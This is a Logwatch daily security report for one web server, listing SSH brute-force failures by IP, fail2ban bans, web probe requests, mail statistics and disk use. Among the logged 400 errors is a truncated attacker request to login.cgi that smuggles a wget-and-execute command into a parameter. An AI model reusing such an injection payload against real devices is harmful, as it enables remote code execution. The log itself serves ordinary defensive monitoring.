################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sun Aug 9 04:42:06 2020 Date Range Processed: yesterday ( 2020-Aug-08 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 56:56 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 6 sites probed the server 109.130.180.30 174.129.107.156 185.220.101.144 185.39.11.105 5.188.210.227 66.240.205.34 Requests with error response codes 400 Bad Request null: 10 Time(s) mstshash=Administr: 2 Time(s) /: 1 Time(s) /Plk6: 1 Time(s) /login.cgi?cli=aa%20aa%27;wget%20http://80 ... h%20/tmp/ks%27$: 1 Time(s) http://5.188.210.227/echo.php: 1 Time(s) 403 Forbidden /resolutionen/sose17/gesellschaftlich_verantwortung/: 2 Time(s) 404 Not Found /robots.txt: 49 Time(s) /wp-login.php: 31 Time(s) /%23: 1 Time(s) /berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 1 Time(s) /berlin/helfika/apple-touch-icon.png: 1 Time(s) /home/verein: 1 Time(s) /reader/1993-so-reader_do93.pdf: 1 Time(s) /reader/1993-wi-reader_st93.pdf: 1 Time(s) /reader/1998-so-reader_ro98.pdf: 1 Time(s) /reader/2011_SoSe_Dresden.pdf': 1 Time(s) /reader/2017_SoSe_Berlin_vorlaeufig.pdf: 1 Time(s) /sites/default/files/1979_WiSe_Karlsruhe.pdf: 1 Time(s) /sites/default/files/1983_SoSe_Clausthal-Zellerfeld.pdf: 1 Time(s) /sites/default/files/2003_WiSe_Bochum.pdf: 1 Time(s) /sites/default/files/Bericht_SommerZaPF13_Jena.pdf: 1 Time(s) /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s) /sites/default/files/Empfehlungen_der_ZaPF ... Fach_Physik.pdf: 1 Time(s) /sites/default/files/Lehramtstellungnahme.pdf: 1 Time(s) /stapf: 1 Time(s) /verein/satzung/%7CSatzung: 1 Time(s) /zapf/reader/2018_WiSe_Wuerzburg: 1 Time(s) 499 (undefined) /10fcMsRyTwuvS5Xs5r3_Fw?view: 1 Time(s) /apple-touch-icon.png: 1 Time(s) /build/emojify.js/dist/css/basic/emojify.min.css: 1 Time(s) /fonts/SourceSansPro-Italic.woff: 1 Time(s) /js/mathjax-config-extra.js: 1 Time(s) 500 Internal Server Error /: 103 Time(s) //login_sid.lua: 1 Time(s) /admin//config.php: 1 Time(s) 503 Service Unavailable /protokoll_konflikte: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (180.76.114.141): 78 Time(s) root (42-200-155-72.static.imsbiz.com): 70 Time(s) root (123.207.111.151): 67 Time(s) root (180.76.142.19): 63 Time(s) root (129.28.191.35): 60 Time(s) root (129.28.165.213): 58 Time(s) root (45.187.152.19): 58 Time(s) root (121.201.95.66): 56 Time(s) root (123.206.90.149): 55 Time(s) root (93.ip-217-182-68.eu): 54 Time(s) root (61.97.248.227): 53 Time(s) root (129.211.49.17): 52 Time(s) root (199.115.230.39): 52 Time(s) root (200.41.86.59): 52 Time(s) root (180.76.163.31): 51 Time(s) root (120.53.238.156): 49 Time(s) root (120.52.93.50): 48 Time(s) root (81.68.75.34): 48 Time(s) root (139.155.86.214): 47 Time(s) root (40.121.53.81): 45 Time(s) root (ninetailed.plus.com): 45 Time(s) root (63.ip-51-178-17.eu): 44 Time(s) root (64.225.70.10): 44 Time(s) root (vps-02a7e42a.vps.ovh.net): 44 Time(s) root (150.136.245.92): 43 Time(s) root (163.172.178.167): 43 Time(s) root (167.172.238.159): 43 Time(s) root (167.71.145.201): 43 Time(s) root (65.151.160.89): 43 Time(s) root (ip31.ip-37-59-229.eu): 43 Time(s) root (ns360710.ip-91-121-164.eu): 43 Time(s) root (107.170.249.6): 42 Time(s) root (112.169.152.105): 42 Time(s) root (206.81.12.141): 42 Time(s) root (79.134.163.20): 42 Time(s) root (104.236.151.120): 41 Time(s) root (49.232.166.190): 41 Time(s) root (103.216.62.73): 40 Time(s) root (106.12.59.245): 40 Time(s) root (119.200.186.168): 40 Time(s) root (139.59.32.156): 40 Time(s) root (185.183.196.61): 40 Time(s) root (211.252.87.90): 40 Time(s) root (v118-27-33-234.wrt7.static.cnode.io): 40 Time(s) root (113.ip-51-68-198.eu): 39 Time(s) root (201.ip-144-217-83.net): 39 Time(s) root (222.190.145.130): 39 Time(s) root (94.28.101.166): 39 Time(s) root (1.236.151.223): 38 Time(s) root (178.128.72.84): 38 Time(s) root (42.159.155.8): 38 Time(s) root (202.83.17.137): 37 Time(s) root (106.13.207.225): 36 Time(s) root (106.12.212.89): 35 Time(s) root (124.239.168.74): 35 Time(s) root (187.141.128.42): 35 Time(s) root (203.172.66.222): 35 Time(s) root (41.217.204.220): 35 Time(s) root (459.413.bras-01.dianet.ru): 35 Time(s) root (180.208.58.145): 34 Time(s) root (182.61.39.49): 34 Time(s) root (203.172.66.227): 34 Time(s) root (62.234.94.202): 34 Time(s) root (p5df46ac5.dip0.t-ipconnect.de): 34 Time(s) root (117.50.99.197): 33 Time(s) root (203.127.84.42): 32 Time(s) unknown (61.50.99.26): 32 Time(s) root (103.91.53.30): 31 Time(s) root (121.52.41.26): 31 Time(s) root (210.112.232.6): 31 Time(s) root (167.71.78.207): 30 Time(s) root (45.176.208.50): 30 Time(s) root (49.233.155.170): 30 Time(s) root (106.13.175.233): 29 Time(s) root (107.170.63.221): 29 Time(s) root (128.199.156.146): 29 Time(s) root (203.148.20.254): 29 Time(s) root (49.233.24.148): 29 Time(s) root (102.ip-192-99-247.net): 28 Time(s) root (118.24.108.205): 27 Time(s) root (139.155.35.220): 27 Time(s) root (61.183.144.188): 27 Time(s) root (103.219.112.63): 26 Time(s) root (118.89.228.58): 26 Time(s) root (122.167.100.45): 26 Time(s) root (122.51.52.154): 26 Time(s) root (183.62.139.167): 26 Time(s) root (117.79.132.166): 25 Time(s) root (103.210.21.207): 24 Time(s) root (190.196.64.93): 24 Time(s) root (212.64.54.167): 24 Time(s) root (104.236.72.182): 23 Time(s) root (106.52.251.24): 23 Time(s) root (49.51.160.139): 23 Time(s) root (196.189.91.129): 22 Time(s) root (4.ip-144-217-85.net): 22 Time(s) root (192.144.187.153): 20 Time(s) root (49.233.216.158): 20 Time(s) unknown (80.157.192.53): 20 Time(s) root (42.194.200.28): 19 Time(s) root (103.63.109.74): 18 Time(s) root (122.51.202.157): 18 Time(s) root (49.235.35.133): 18 Time(s) root (114.ip-92-222-92.eu): 17 Time(s) root (142.93.107.175): 17 Time(s) root (178.33.12.237): 17 Time(s) root (61.50.99.26): 17 Time(s) unknown (89.222.181.58): 17 Time(s) root (l37-193-61-38.novotelecom.ru): 16 Time(s) root (119.90.61.10): 15 Time(s) root (135.ip-193-70-39.eu): 15 Time(s) root (201.210.147.8): 15 Time(s) root (119.45.55.249): 14 Time(s) root (51.159.28.62): 14 Time(s) unknown (49.235.74.226): 13 Time(s) root (27.115.127.210): 12 Time(s) root (89.222.181.58): 12 Time(s) root (106.13.167.77): 11 Time(s) root (144.34.194.39.16clouds.com): 11 Time(s) root (49.235.74.226): 11 Time(s) root (122.51.77.128): 10 Time(s) root (174.110.88.87): 10 Time(s) root (67.209.185.218.16clouds.com): 10 Time(s) unknown (167.71.78.207): 10 Time(s) root (106.13.45.212): 9 Time(s) root (138.68.21.125): 9 Time(s) root (20.0-24.49.84.195.host.songnetworks.se): 9 Time(s) root (49.235.11.137): 9 Time(s) root (80.157.192.53): 9 Time(s) root (122.51.186.145): 8 Time(s) root (223.235.194.8): 8 Time(s) root (101.ip-51-91-157.eu): 7 Time(s) root (190.210.62.45): 7 Time(s) root (212.145.192.205): 7 Time(s) root (244.ip-51-38-186.eu): 7 Time(s) root (112.91.145.58): 6 Time(s) root (118.70.72.103): 6 Time(s) root (node-19gc.pool-182-52.dynamic.totinternet.net): 6 Time(s) root (126.ip-51-38-191.eu): 5 Time(s) root (180.167.53.18): 5 Time(s) root (181.48.46.195): 5 Time(s) root (118.70.233.163): 4 Time(s) root (142.93.62.181): 4 Time(s) root (149.202.175.255): 4 Time(s) root (67.216.206.250.16clouds.com): 4 Time(s) root (ns3593477.ip-213-251-184.eu): 4 Time(s) unknown (119.200.186.168): 4 Time(s) root (111.229.102.53): 3 Time(s) root (134.209.194.208): 3 Time(s) root (159.89.115.126): 3 Time(s) root (172.96.194.241.16clouds.com): 3 Time(s) root (59.ip-145-239-78.eu): 3 Time(s) root (66.96.235.110): 3 Time(s) root (85.209.0.252): 3 Time(s) root (monitoramento.s4networks.com.br): 3 Time(s) root (101.255.81.91): 2 Time(s) root (174.137.58.11.16clouds.com): 2 Time(s) root (186-93-60-224.genericrev.cantv.net): 2 Time(s) root (187.35.129.125): 2 Time(s) root (58.213.76.154): 2 Time(s) root (85.209.0.253): 2 Time(s) unknown (217-105-175-247.cable.dynamic.v4.ziggo.nl): 2 Time(s) unknown (ns3075283.ip-217-182-194.eu): 2 Time(s) root (104.223.197.3): 1 Time(s) root (106.12.97.46): 1 Time(s) root (106.13.142.222): 1 Time(s) root (112.13.200.154): 1 Time(s) root (112.166.159.199): 1 Time(s) root (114.67.203.36): 1 Time(s) root (114.67.230.163): 1 Time(s) root (119.29.26.222): 1 Time(s) root (120.92.109.67): 1 Time(s) root (122-60-81-167-adsl.sparkbb.co.nz): 1 Time(s) root (123.31.12.113): 1 Time(s) root (129.28.183.62): 1 Time(s) root (129.28.185.31): 1 Time(s) root (152.250.245.182): 1 Time(s) root (188.0.128.53): 1 Time(s) root (201.163.1.66): 1 Time(s) root (202.72.225.17): 1 Time(s) root (221.195.189.144): 1 Time(s) root (242.48.92.62.static.cust.telenor.com): 1 Time(s) root (27.185.12.20): 1 Time(s) root (40.117.225.27): 1 Time(s) root (40.73.0.147): 1 Time(s) root (45.14.149.38): 1 Time(s) root (59.15.3.197): 1 Time(s) root (61.132.52.45): 1 Time(s) root (80.251.219.170.16clouds.com): 1 Time(s) root (81.141.159.0): 1 Time(s) root (81.68.102.6): 1 Time(s) root (83.214.96.34.bc.googleusercontent.com): 1 Time(s) root (85.209.0.24): 1 Time(s) root (91.225.77.52): 1 Time(s) root (condor2170.startdedicated.com): 1 Time(s) root (host-69-241-58-117.alwayson.net.bd): 1 Time(s) unknown (101.255.81.91): 1 Time(s) unknown (182.61.39.49): 1 Time(s) Invalid Users: Unknown Account: 102 Time(s) Bad User: +: 1 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 6 Miscellaneous warnings 19.077K Bytes accepted 19,535 19.077K Bytes sent via SMTP 19,535 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 4 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 4 Total 4xx Rejects 100.00% ======== ================================================== 194 Connections 182 Connections lost (inbound) 194 Disconnections 1 Removed from queue 1 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 1 Time(s) Failed logins from: 1.236.151.223: 38 times 27.115.127.210: 12 times 27.185.12.20: 1 time 31.125.100.24 (ninetailed.plus.com): 45 times 34.96.214.83 (83.214.96.34.bc.googleusercontent.com): 1 time 37.59.229.31 (ip31.ip-37-59-229.eu): 43 times 37.193.61.38 (l37-193-61-38.novotelecom.ru): 16 times 40.73.0.147: 1 time 40.117.225.27: 1 time 40.121.53.81: 45 times 41.217.204.220: 35 times 42.159.155.8: 38 times 42.194.200.28: 19 times 42.200.155.72 (42-200-155-72.static.imsbiz.com): 70 times 45.14.149.38: 1 time 45.176.208.50: 30 times 45.187.152.19 (45.187.152-19.vialocalnet.com.br): 58 times 49.51.160.139: 23 times 49.232.166.190: 41 times 49.233.24.148: 29 times 49.233.155.170: 30 times 49.233.216.158: 20 times 49.235.11.137: 9 times 49.235.35.133: 18 times 49.235.74.226: 11 times 51.38.186.244 (244.ip-51-38-186.eu): 7 times 51.38.191.126 (126.ip-51-38-191.eu): 5 times 51.68.198.113 (113.ip-51-68-198.eu): 39 times 51.91.157.101 (101.ip-51-91-157.eu): 7 times 51.159.28.62 (51-159-28-62.rev.poneytelecom.eu): 14 times 51.178.17.63 (63.ip-51-178-17.eu): 44 times 51.210.151.242 (vps-02a7e42a.vps.ovh.net): 44 times 58.213.76.154: 2 times 59.15.3.197: 1 time 61.50.99.26: 17 times 61.97.248.227: 53 times 61.132.52.45: 1 time 61.183.144.188: 27 times 62.92.48.242 (242.48.92.62.static.cust.telenor.com): 1 time 62.234.94.202: 34 times 64.225.70.10: 44 times 65.151.160.89: 43 times 66.96.235.110 (host-66-96-235-110.myrepublic.co.id): 3 times 67.209.185.218 (67.209.185.218.16clouds.com): 10 times 67.216.206.250 (67.216.206.250.16clouds.com): 4 times 79.134.163.20 (20-163-134-79.filibe.net): 42 times 80.157.192.53: 9 times 80.251.219.170 (80.251.219.170.16clouds.com): 1 time 81.68.75.34: 48 times 81.68.102.6: 1 time 81.141.159.0 (host81-141-159-0.in-addr.btcentralplus.com): 1 time 85.209.0.24: 1 time 85.209.0.252: 3 times 85.209.0.253: 2 times 89.222.181.58 (host-181-58.dialog-k.ru): 12 times 91.121.164.188 (ns360710.ip-91-121-164.eu): 43 times 91.225.77.52: 1 time 92.222.92.114 (114.ip-92-222-92.eu): 17 times 93.244.106.197 (p5df46ac5.dip0.t-ipconnect.de): 34 times 94.28.101.166: 39 times 94.230.121.29 (459.413.bras-01.dianet.ru): 35 times 101.255.81.91: 2 times 103.63.109.74 (static.cmcti.vn): 18 times 103.91.53.30: 31 times 103.210.21.207: 24 times 103.216.62.73 (host.sindad.com): 40 times 103.219.112.63: 26 times 104.223.197.3: 1 time 104.236.72.182: 23 times 104.236.151.120: 41 times 106.12.59.245: 40 times 106.12.97.46: 1 time 106.12.212.89: 35 times 106.13.45.212: 9 times 106.13.142.222: 1 time 106.13.167.77: 11 times 106.13.175.233: 29 times 106.13.207.225: 36 times 106.52.251.24: 23 times 107.170.63.221: 29 times 107.170.249.6: 42 times 111.229.102.53: 3 times 112.13.200.154: 1 time 112.91.145.58: 6 times 112.166.159.199: 1 time 112.169.152.105: 42 times 114.67.203.36: 1 time 114.67.230.163: 1 time 117.50.99.197: 33 times 117.58.241.69 (host-69-241-58-117.alwayson.net.bd): 1 time 117.79.132.166: 25 times 118.24.108.205: 27 times 118.27.33.234 (v118-27-33-234.wrt7.static.cnode.io): 40 times 118.70.72.103: 6 times 118.70.233.163: 4 times 118.89.228.58: 26 times 119.29.26.222: 1 time 119.45.55.249: 14 times 119.90.61.10 (undefine.inidc.com.cn): 15 times 119.200.186.168: 40 times 120.52.93.50: 48 times 120.53.238.156: 49 times 120.92.109.67: 1 time 121.52.41.26: 31 times 121.201.95.66: 56 times 122.51.52.154: 26 times 122.51.77.128: 10 times 122.51.186.145: 8 times 122.51.202.157: 18 times 122.60.81.167 (122-60-81-167-adsl.sparkbb.co.nz): 1 time 122.167.100.45 (abts-kk-dynamic-045.100.167.122.airtelbroadband.in): 26 times 123.31.12.113 (static.vnpt.vn): 1 time 123.206.90.149: 55 times 123.207.111.151: 67 times 124.239.168.74: 35 times 128.199.156.146: 29 times 129.28.165.213: 58 times 129.28.183.62: 1 time 129.28.185.31: 1 time 129.28.191.35: 60 times 129.211.49.17: 52 times 134.209.194.208: 3 times 138.68.21.125: 9 times 139.59.32.156: 40 times 139.155.35.220: 27 times 139.155.86.214: 47 times 142.93.62.181: 4 times 142.93.107.175 (emrenindunyasi.google.com): 17 times 144.34.194.39 (144.34.194.39.16clouds.com): 11 times 144.217.83.201 (201.ip-144-217-83.net): 39 times 144.217.85.4 (4.ip-144-217-85.net): 22 times 145.239.78.59 (59.ip-145-239-78.eu): 3 times 149.202.175.255: 4 times 150.136.245.92: 43 times 152.250.245.182 (152-250-245-182.user.vivozap.com.br): 1 time 159.89.115.126: 3 times 163.172.178.167 (167-178-172-163.instances.scw.cloud): 43 times 167.71.78.207: 30 times 167.71.145.201: 43 times 167.172.238.159: 43 times 172.96.194.241 (172.96.194.241.16clouds.com): 3 times 174.110.88.87 (mta-174-110-88-87.nc.rr.com): 10 times 174.137.58.11 (174.137.58.11.16clouds.com): 2 times 178.33.12.237: 17 times 178.128.72.84: 38 times 180.76.114.141: 78 times 180.76.142.19: 63 times 180.76.163.31: 51 times 180.167.53.18: 5 times 180.208.58.145: 34 times 181.48.46.195: 5 times 182.52.230.28 (node-19gc.pool-182-52.dynamic.totinternet.net): 6 times 182.61.39.49: 34 times 183.62.139.167: 26 times 185.183.196.61: 40 times 186.93.60.224 (186-93-60-224.genericrev.cantv.net): 2 times 187.35.129.125 (187-35-129-125.dsl.telesp.net.br): 2 times 187.141.128.42 (customer-187-141-128-42-sta.uninet-ide.com.mx): 35 times 188.0.128.53 (53.128.0.188.static.ktc.kz): 1 time 189.39.112.219 (monitoramento.s4networks.com.br): 3 times 190.196.64.93: 24 times 190.210.62.45 (customer-static-210-62-45.iplannetworks.net): 7 times 192.99.247.102 (102.ip-192-99-247.net): 28 times 192.144.187.153: 20 times 193.70.39.135 (135.ip-193-70-39.eu): 15 times 195.84.49.20 (20.0-24.49.84.195.host.songnetworks.se): 9 times 196.189.91.129: 22 times 199.115.230.39 (superb-pony-1.localdomain): 52 times 200.41.86.59: 52 times 201.163.1.66 (static-201-163-1-66.alestra.net.mx): 1 time 201.210.147.8 (201-210-147-8.genericrev.cantv.net): 15 times 202.72.225.17: 1 time 202.83.17.137 (act2028317137.broadband.actcorp.in): 37 times 203.127.84.42: 32 times 203.148.20.254 (static-ip-254-20-148-203.rev.dyxnet.com): 29 times 203.172.66.222: 35 times 203.172.66.227: 34 times 206.81.12.141: 42 times 209.126.124.203 (condor2170.startdedicated.com): 1 time 210.112.232.6: 31 times 211.252.87.90: 40 times 212.64.54.167: 24 times 212.145.192.205 (static-adsl-a-1-205.ipcom.comunitel.net): 7 times 213.251.184.102 (ns3593477.ip-213-251-184.eu): 4 times 217.182.68.93 (93.ip-217-182-68.eu): 54 times 221.195.189.144: 1 time 222.190.145.130: 39 times 223.235.194.8: 8 times Illegal users from: undef: 95 times 49.235.74.226: 13 times 61.50.99.26: 33 times 65.49.20.66: 1 time 80.157.192.53: 20 times 89.222.181.58 (host-181-58.dialog-k.ru): 17 times 101.255.81.91: 1 time 119.200.186.168: 4 times 167.71.78.207: 10 times 182.61.39.49: 1 time 217.105.175.247 (217-105-175-247.cable.dynamic.v4.ziggo.nl): 2 times 217.182.194.103 (ns3075283.ip-217-182-194.eu): 2 times ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 242G 159G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################